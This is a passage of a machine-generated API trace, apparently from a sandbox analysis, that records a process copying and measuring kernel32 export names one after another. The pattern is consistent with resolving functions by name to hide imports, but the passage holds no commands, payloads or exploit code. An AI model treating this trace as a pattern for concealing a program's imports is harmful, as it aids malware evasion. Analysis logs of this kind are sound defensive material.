lpString1="CopyFileA") returned="CopyFileA" [0182.034] lstrlenA (lpString="COPYFILEA") returned 9 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.034] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.034] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.034] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.034] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.034] lstrlenA (lpString="COPYFILEW") returned 9 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.034] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.034] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.034] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.034] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.034] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.034] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.034] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.034] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.035] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.035] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.035] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.035] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.035] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.035] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.035] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.035] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.035] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.035] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.035] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.035] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.035] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.035] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.035] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.035] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.035] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.035] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.036] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.036] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.036] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.036] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.036] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.036] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.036] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.036] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.036] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.036] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.036] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0182.036] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.036] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.036] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.036] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.036] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.036] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.036] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.036] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.037] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.037] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.037] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.037] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.037] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.037] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.037] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.037] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.037] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.037] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.037] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.037] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.037] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.037] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.037] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.037] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.037] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.038] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.038] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.038] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.038] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.038] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.038] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.038] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.038] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.038] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.038] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.038] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.038] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.038] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.038] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.038] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.038] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.038] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.038] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.039] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.039] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.039] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.039] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.039] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.039] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.039] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.039] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.039] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.039] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.039] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.039] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.039] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.039] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.039] lstrlenA (lpString="DELETEATOM") returned 10 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.039] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.039] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.039] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.040] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.040] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.040] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.040] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.040] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.040] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.040] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.040] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.040] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.040] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.040] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.040] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.040] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.040] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.040] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.040] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.040] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.040] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.040] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.041] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.041] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.041] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.041] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.041] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.041] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.041] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.041] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.041] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.041] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.041] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.041] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.041] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.041] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: 